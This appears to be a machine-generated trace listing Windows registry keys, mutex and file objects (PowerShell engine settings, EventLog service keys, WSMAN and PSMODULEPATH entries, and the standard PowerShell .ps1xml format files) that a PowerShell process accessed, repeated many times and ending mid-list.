SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
Mutex
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
